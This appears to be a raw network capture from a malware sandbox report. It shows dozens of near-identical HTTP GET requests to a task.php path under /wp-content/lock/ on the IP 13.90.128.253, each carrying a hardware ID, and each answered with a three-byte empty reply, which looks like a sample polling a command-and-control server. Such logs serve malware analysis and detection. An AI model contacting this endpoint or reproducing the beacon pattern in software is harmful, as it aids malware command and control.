                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.016099930 CET825INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:55 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:56.122852087 CET825OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.276272058 CET826INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:56 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:56.406706095 CET826OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.518187046 CET826INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:56 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:56.638665915 CET826OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.748296022 CET827INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:56 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:56.866013050 CET827OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.980732918 CET827INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:56 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:57.091743946 CET827OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.254293919 CET828INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:57 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:57.357608080 CET828OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.468750000 CET828INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:57 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:57.577466965 CET828OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.692078114 CET829INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:57 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:57.795171022 CET829OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.907229900 CET829INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:57 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:58.013896942 CET829OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.202336073 CET830INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:58 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:58.310642004 CET830OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.421519995 CET830INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:58 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:58.529437065 CET830OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.639164925 CET831INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:58 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:58.748105049 CET831OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.857167959 CET831INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:58 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:58.966923952 CET832OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.132725954 CET832INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:59 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:59.248868942 CET832OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.355093956 CET832INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:59 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:59.467259884 CET833OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.575210094 CET833INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:59 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:59.685913086 CET833OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.796618938 CET833INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:59 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:59.904557943 CET833OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.304919958 CET834INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:59 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:26.406785011 CET834OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.601267099 CET834INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:26 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:26.723223925 CET835OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.836591005 CET835INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:26 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:26.938206911 CET835OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.048418999 CET835INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:26 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:27.157444000 CET836OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.315444946 CET836INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:27.422898054 CET836OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.530560970 CET837INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:27.641423941 CET837OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.752068996 CET837INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:27.860275030 CET837OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.979752064 CET838INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:28.094470024 CET838OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.255086899 CET838INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:28.367805004 CET838OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.476284981 CET839INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:28.585969925 CET839OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.695064068 CET839INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:28.797561884 CET839OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.928524971 CET840INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:29.188267946 CET840OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.470705032 CET840INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:29 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:29.622708082 CET840OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.745882034 CET841INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:29 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:30.177222013 CET841OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.330084085 CET841INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:30.438369989 CET842OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.547013998 CET842INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:30.709228039 CET842OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.818365097 CET842INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:30.927628040 CET843OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.034219027 CET843INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:31.378030062 CET843OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.532601118 CET843INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:31.650194883 CET844OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.774255037 CET844INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:31.876197100 CET844OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.983685970 CET845INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:32.094784021 CET845OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.250843048 CET845INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:32.382090092 CET845OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.489087105 CET846INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
